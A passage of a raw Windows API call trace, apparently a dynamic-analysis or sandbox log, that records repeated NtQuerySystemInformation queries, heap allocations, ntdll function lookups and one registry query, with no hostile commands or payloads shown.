(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.005] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.010] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.011] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.012] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.013] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.014] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.015] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.016] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0235.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0238.951] GetProcessHeap () returned 0x269489b0000 [0238.951] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949c0a360 [0238.951] GetProcessHeap () returned 0x269489b0000 [0238.951] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d3190 [0238.951] GetProcessHeap () returned 0x269489b0000 [0238.951] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x12c) returned 0x26949cf2e70 [0238.951] GetProcessHeap () returned 0x269489b0000 [0238.951] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x138) returned 0x2694959f0c0 [0238.951] GetProcessHeap () returned 0x269489b0000 [0238.951] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x0, Size=0x140) returned 0x26948a9ac60 [0238.951] GetProcessHeap () returned 0x269489b0000 [0238.951] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c56460 [0238.951] GetProcessHeap () returned 0x269489b0000 [0238.951] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x140) returned 0x26949710800 [0238.951] GetProcessHeap () returned 0x269489b0000 [0238.951] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949c09700 [0238.951] GetProcessHeap () returned 0x269489b0000 [0238.952] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d31a0 [0238.952] GetProcessHeap () returned 0x269489b0000 [0238.952] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a9ac60 | out: hHeap=0x269489b0000) returned 1 [0238.952] GetProcessHeap () returned 0x269489b0000 [0238.952] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x1f4) returned 0x26948a9ac60 [0238.952] GetProcessHeap () returned 0x269489b0000 [0238.952] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xf4) returned 0x269495b0c50 [0238.952] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xa781ffef78 | out: phModule=0xa781ffef78*=0x7ffcea380000) returned 1 [0238.952] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0238.957] GetProcessHeap () returned 0x269489b0000 [0238.957] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949c0a410 [0238.957] GetProcessHeap () returned 0x269489b0000 [0238.957] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d33b0 [0238.958] GetProcessHeap () returned 0x269489b0000 [0238.958] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xfe) returned 0x26948a0d960 [0238.959] GetProcessHeap () returned 0x269489b0000 [0238.959] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x108) returned 0x26948a0ec80 [0238.959] GetProcessHeap () returned 0x269489b0000 [0238.959] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c572a0 [0238.959] GetProcessHeap () returned 0x269489b0000 [0238.959] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x110) returned 0x2694967eea0 [0238.959] GetProcessHeap () returned 0x269489b0000 [0238.959] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949c0ad00 [0238.959] GetProcessHeap () returned 0x269489b0000 [0238.959] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d33c0 [0238.959] GetProcessHeap () returned 0x269489b0000 [0238.959] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a51a40 | out: hHeap=0x269489b0000) returned 1 [0238.960] GetProcessHeap () returned 0x269489b0000 [0238.960] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x1c4) returned 0x26948a9ac60 [0238.960] GetProcessHeap () returned 0x269489b0000 [0238.960] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xfc) returned 0x26948a0dc90 [0238.960] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xa781fff028 | out: phModule=0xa781fff028*=0x7ffcea380000) returned 1 [0238.960] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0239.685] RegQueryInfoKeyW (hKey=0x160, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xa781fff2ec, lpcbMaxValueNameLen=0xa781fff2e4, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) [0239.685] GetProcessHeap () returned 0x269489b0000 [0239.685] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949c09d30 [0239.685] GetProcessHeap () returned 0x269489b0000 [0239.685] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d3190 [0239.686] GetProcessHeap () returned 0x269489b0000 [0239.686] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xfe) returned 0x26948a0da70 [0239.688] GetProcessHeap () returned 0x269489b0000 [0239.688] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x108) returned 0x26948a0dc90 [0239.688] GetProcessHeap () returned 0x269489b0000 [0239.688] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x30) returned 0x26949c574e0 [0239.688] GetProcessHeap () returned 0x269489b0000 [0239.688] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x110) returned 0x2694967eea0 [0239.688] GetProcessHeap () returned 0x269489b0000 [0239.688] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xa0) returned 0x26949c09bd0 [0239.688] GetProcessHeap () returned 0x269489b0000 [0239.688] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x8) returned 0x269499d33c0 [0239.688] GetProcessHeap () returned 0x269489b0000 [0239.688] HeapFree (in: hHeap=0x269489b0000, dwFlags=0x0, lpMem=0x26948a51a40 | out: hHeap=0x269489b0000) returned 1 [0239.689] GetProcessHeap () returned 0x269489b0000 [0239.689] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0x1c4) returned 0x26948a9ac60 [0239.689] GetProcessHeap () returned 0x269489b0000 [0239.689] RtlAllocateHeap (HeapHandle=0x269489b0000, Flags=0x8, Size=0xfc) returned 0x26948a0e2f0 [0239.690] GetModuleHandleExW (in: dwFlags=0x1, lpModuleName="ntdll.dll", phModule=0xa781fff028 | out: phModule=0xa781fff028*=0x7ffcea380000) returned 1 [0239.690] GetProcAddress (hModule=0x7ffcea380000, lpProcName="NtQuerySystemInformation") returned 0x7ffcea425a50 [0303.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0a0, Length=0x50, ResultLength=0x0) [0303.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0a0, Length=0x50, ResultLength=0x0) [0303.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0a0, Length=0x50, ResultLength=0x0) [0303.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf90, Length=0x50, ResultLength=0x0) [0303.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf90, Length=0x50, ResultLength=0x0) [0303.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf90, Length=0x50, ResultLength=0x0) [0303.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf90, Length=0x50, ResultLength=0x0) [0303.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdec0, Length=0x38, ResultLength=0x0) [0303.569] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcf0, Length=0x28, ResultLength=0x0) [0303.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcf0, Length=0x28, ResultLength=0x0) [0303.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcf0, Length=0x28, ResultLength=0x0) [0303.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcf0, Length=0x28, ResultLength=0x0) [0303.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd60, Length=0x28, ResultLength=0x0) [0303.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdec0, Length=0x38, ResultLength=0x0) [0303.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdde0, Length=0x28, ResultLength=0x0) [0303.574] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdde0, Length=0x28, ResultLength=0x0) [0303.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc80, Length=0x20, ResultLength=0x0) [0303.575] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x20, ResultLength=0x0) [0303.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x20, ResultLength=0x0) [0303.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdc00, Length=0x20, ResultLength=0x0) [0303.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdec0, Length=0x38, ResultLength=0x0) [0303.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdec0, Length=0x38, ResultLength=0x0) [0303.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdd40, Length=0x20, ResultLength=0x0) [0303.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcd0, Length=0x20, ResultLength=0x0) [0303.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.578] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdcd0, Length=0x20, ResultLength=0x0) [0303.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.579] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.580] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2f0, Length=0x50, ResultLength=0x0) [0303.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2f0, Length=0x50, ResultLength=0x0) [0303.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.584] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2f0, Length=0x50, ResultLength=0x0) [0303.585] NtQuerySystemInformation 